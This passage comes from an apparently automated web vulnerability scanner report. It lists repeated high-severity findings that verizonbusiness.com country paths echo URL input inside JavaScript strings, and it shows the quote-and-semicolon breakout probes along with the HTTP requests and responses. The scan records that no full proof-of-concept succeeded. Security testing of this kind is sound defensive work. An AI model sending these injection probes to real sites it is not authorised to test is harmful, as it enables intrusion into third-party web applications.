Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/atab853';7f22bd307df/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.473. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /au/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575d9"%3b9536fc22c0e was submitted in the REST URL parameter 1. This input was echoed as 575d9";9536fc22c0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /au575d9"%3b9536fc22c0e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/au575d9";9536fc22c0e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.474. http://www.verizonbusiness.com/au/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /au/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45413'%3bad2c5fa4100 was submitted in the REST URL parameter 1. This input was echoed as 45413';ad2c5fa4100 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /au45413'%3bad2c5fa4100/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:41 GMT
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/au45413';ad2c5fa4100/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.475. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /be/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56300"%3b62e1f7a15f was submitted in the REST URL parameter 1. This input was echoed as 56300";62e1f7a15f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /be56300"%3b62e1f7a15f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/be56300";62e1f7a15f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.476. http://www.verizonbusiness.com/be/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /be/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6722'%3b2647232b65f was submitted in the REST URL parameter 1. This input was echoed as a6722';2647232b65f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bea6722'%3b2647232b65f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/bea6722';2647232b65f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.477. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /br/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22b84'%3b430c445e2d1 was submitted in the REST URL parameter 1. This input was echoed as 22b84';430c445e2d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /br22b84'%3b430c445e2d1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:56 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/br22b84';430c445e2d1/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.478. http://www.verizonbusiness.com/br/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /br/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52502"%3b087f648069a was submitted in the REST URL parameter 1. This input was echoed as 52502";087f648069a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /br52502"%3b087f648069a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/br52502";087f648069a/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.479. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ca/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47483'%3b9b048c90bc4 was submitted in the REST URL parameter 1. This input was echoed as 47483';9b048c90bc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ca47483'%3b9b048c90bc4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ca47483';9b048c90bc4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.480. http://www.verizonbusiness.com/ca/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ca/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c241"%3bd40d9908d5b was submitted in the REST URL parameter 1. This input was echoed as 4c241";d40d9908d5b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ca4c241"%3bd40d9908d5b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/ca4c241";d40d9908d5b/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.481. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ch/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eeb35"%3b3964adae0ff was submitted in the REST URL parameter 1. This input was echoed as eeb35";3964adae0ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cheeb35"%3b3964adae0ff/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40820
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cheeb35";3964adae0ff/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.482. http://www.verizonbusiness.com/ch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ch/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6d7a'%3bd34ef7e9b8e was submitted in the REST URL parameter 1. This input was echoed as a6d7a';d34ef7e9b8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cha6d7a'%3bd34ef7e9b8e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40820
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/cha6d7a';d34ef7e9b8e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.483. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c78b8'%3b45cebbc83db was submitted in the REST URL parameter 1. This input was echoed as c78b8';45cebbc83db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clc78b8'%3b45cebbc83db/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/clc78b8';45cebbc83db/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.484. http://www.verizonbusiness.com/cl/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cl/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9575f"%3ba9f6ed2feb8 was submitted in the REST URL parameter 1. This input was echoed as 9575f";a9f6ed2feb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cl9575f"%3ba9f6ed2feb8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:28 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cl9575f";a9f6ed2feb8/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.485. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d51a5"%3b144e85efc1d was submitted in the REST URL parameter 1. This input was echoed as d51a5";144e85efc1d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cnd51a5"%3b144e85efc1d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:53 GMT

